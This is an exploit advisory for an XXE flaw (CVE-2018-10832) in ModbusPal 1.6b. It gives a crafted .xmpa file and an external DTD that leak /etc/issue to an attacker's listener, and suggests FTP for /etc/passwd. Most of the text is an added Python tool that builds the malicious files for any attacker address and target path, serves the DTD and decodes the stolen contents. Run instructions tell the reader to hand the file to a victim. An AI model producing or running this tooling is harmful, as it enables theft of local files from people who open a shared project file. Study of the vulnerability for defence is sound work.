[+] Exploit Title: ModbusPal XXE Injection
[+] Date: 05-08-2018
[+] Exploit Author: Trent Gordon
[+] Vendor Homepage: http://modbuspal.sourceforge.net/
[+] Software Link: https://sourceforge.net/projects/modbuspal/files/latest/download?source=files
[+] Version: 1.6b
[+] Tested on: Ubuntu 16.04 with Java 1.8.0_151
[+] CVE: CVE-2018-10832

1. Vulnerability Description

ModbusPal 1.6b is vulnerable to an XML External Entity (XXE) attack. Projects are saved as .xmpp files and automations can be exported as .xmpa files; both formats are XML-based and both are vulnerable to XXE injection. Sending a crafted .xmpp or .xmpa file to a user who then opens or imports it in ModbusPal 1.6b returns the contents of local files on that user's machine to a remote attacker.

2. Proof of Concept
a.) Start a listener on ATTACKERS-IP that also hosts evil.xml:

    python -m SimpleHTTPServer 9999

b.) Contents of the hosted "evil.xml" (an external DTD: %data reads the target file, and %param1 declares a general entity whose SYSTEM identifier carries the file contents back to the listener):

    <!ENTITY % data SYSTEM "file:///etc/issue">
    <!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://ATTACKERS-IP:9999/?%data;'>">

c.) Example exploited "xxe.xmpa" (the internal subset fetches evil.xml and expands %param1, the &exfil; reference triggers the outbound request, and the remainder is the automation markup ModbusPal expects to import):

    <?xml version="1.0"?>
    <!DOCTYPE r [
    <!ELEMENT r ANY>
    <!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/evil.xml">
    %sp;
    %param1;
    ]>
    <r>&exfil;</r>
    <!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">
    <modbuspal_automation>
      <automation name="temp" step="1.0" loop="true" init="0.0"></automation>
    </modbuspal_automation>

When the victim imports xxe.xmpa, the listener log shows a GET for /evil.xml followed by a GET whose query string is the contents of /etc/issue.

3. Additional Details

Java 1.7 contains certain defenses against XXE, including throwing a java.net.MalformedURLException when certain characters (such as '\n') are included in a URL. This means that the file exfiltrated in the above attack is limited to single-line files that don't contain any restricted characters. The above PoC uses /etc/issue, which is one of the few common Linux files that meets this criterion. Exploitation of this vulnerability on later versions of Java requires a more creative approach than described above, such as using FTP instead of HTTP to exfiltrate /etc/passwd.
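The following script ties steps a.) through c.) together from the attacker's side and encodes the single-line constraint from section 3. It is an added example, not code from the original advisory or from the ModbusPal project. It generates evil.xml and xxe.xmpa for a listener address, port and target path supplied on the command line (assumed values; ATTACKERS-IP, 9999 and /etc/issue are only defaults), then runs a listener that serves evil.xml and prints whatever the victim's parser appends to the query string. Unlike SimpleHTTPServer it recovers the leaked data from the raw request line, because the JDK client sends the SYSTEM identifier verbatim and an unencoded space would otherwise truncate the path. The http_exfil_candidate() check is a heuristic for the single-line restriction described above, not a reproduction of the JDK's URL validation.

```python
#!/usr/bin/env python3
"""Attacker-side helper for the out-of-band XXE flow in the advisory.

Added example, not code from ModbusPal or from the original advisory.
Listener address, port and target path are assumed values taken from
the command line."""
import sys
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import unquote

EVIL_XML = "evil.xml"
# Filled in by main(); the defaults are assumed values for stand-alone use.
CONFIG = {"ip": "ATTACKERS-IP", "port": 9999, "target": "/etc/issue"}


def build_evil_xml(ip: str, port: int, target: str) -> str:
    """External DTD (step b): %data reads the target file, %param1 declares an
    entity whose SYSTEM identifier carries the file contents to the listener."""
    return (
        f'<!ENTITY % data SYSTEM "file://{target}">\n'
        f'<!ENTITY % param1 "<!ENTITY exfil SYSTEM '
        f"'http://{ip}:{port}/?%data;'>\">\n"
    )


def build_xmpa(ip: str, port: int) -> str:
    """The .xmpa handed to the victim (step c): the internal subset fetches
    evil.xml and expands %param1, &exfil; fires the outbound request, and the
    trailing automation markup is what ModbusPal expects to import."""
    return (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE r [\n"
        "<!ELEMENT r ANY>\n"
        f'<!ENTITY % sp SYSTEM "http://{ip}:{port}/{EVIL_XML}">\n'
        "%sp;\n"
        "%param1;\n"
        "]>\n"
        "<r>&exfil;</r>\n"
        '<!DOCTYPE modbuspal_automation SYSTEM "modbuspal.dtd">\n'
        "<modbuspal_automation>\n"
        '  <automation name="temp" step="1.0" loop="true" init="0.0"></automation>\n'
        "</modbuspal_automation>\n"
    )


def http_exfil_candidate(contents: bytes) -> bool:
    """Heuristic for the restriction in section 3: the file body, minus any
    trailing newlines, must contain no CR or LF. Multi-line files such as
    /etc/passwd need a different channel (for example FTP)."""
    body = contents.rstrip(b"\r\n")
    return len(body) > 0 and b"\n" not in body and b"\r" not in body


def decode_exfil(requestline: str) -> Optional[str]:
    """Recover the leaked line from the raw HTTP request line, e.g.
    'GET /?Ubuntu 16.04.3 LTS \\n \\l HTTP/1.1'. Spaces may arrive unencoded,
    so the handler's own split path cannot be trusted here."""
    method, sep, rest = requestline.partition(" ")
    if not sep or method != "GET":
        return None
    if rest.endswith((" HTTP/1.1", " HTTP/1.0")):
        rest = rest.rsplit(" ", 1)[0]
    _, sep, query = rest.partition("?")
    return unquote(query) if sep and query else None


class ExfilHandler(BaseHTTPRequestHandler):
    """Serves evil.xml and records the exfiltration callback (step a)."""

    def do_GET(self) -> None:
        if self.path == f"/{EVIL_XML}":
            dtd = build_evil_xml(CONFIG["ip"], CONFIG["port"], CONFIG["target"])
            self._reply(dtd.encode(), "application/xml-dtd")
            return
        leaked = decode_exfil(self.requestline)
        if leaked is not None:
            print(f"[+] {self.client_address[0]} leaked {CONFIG['target']}: {leaked!r}",
                  file=sys.stderr)
        self._reply(b"", "text/plain")

    def _reply(self, body: bytes, ctype: str) -> None:
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def main(argv: list) -> int:
    if len(argv) != 4:
        print(f"usage: {argv[0]} ATTACKERS-IP PORT /path/on/victim", file=sys.stderr)
        return 2
    CONFIG.update(ip=argv[1], port=int(argv[2]), target=argv[3])
    with open("xxe.xmpa", "w") as fh:
        fh.write(build_xmpa(CONFIG["ip"], CONFIG["port"]))
    with open(EVIL_XML, "w") as fh:  # kept on disk for reference; served dynamically
        fh.write(build_evil_xml(CONFIG["ip"], CONFIG["port"], CONFIG["target"]))
    print(f"[*] wrote xxe.xmpa; listening on 0.0.0.0:{CONFIG['port']}", file=sys.stderr)
    HTTPServer(("0.0.0.0", CONFIG["port"]), ExfilHandler).serve_forever()
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python3 xxe_listener.py 10.0.0.5 9999 /etc/issue` (assumed address and filename), hand the generated xxe.xmpa to the victim, and watch stderr for the leaked line. Check a candidate target with http_exfil_candidate() before relying on the HTTP channel; a False result means the file will hit the MalformedURLException described in section 3.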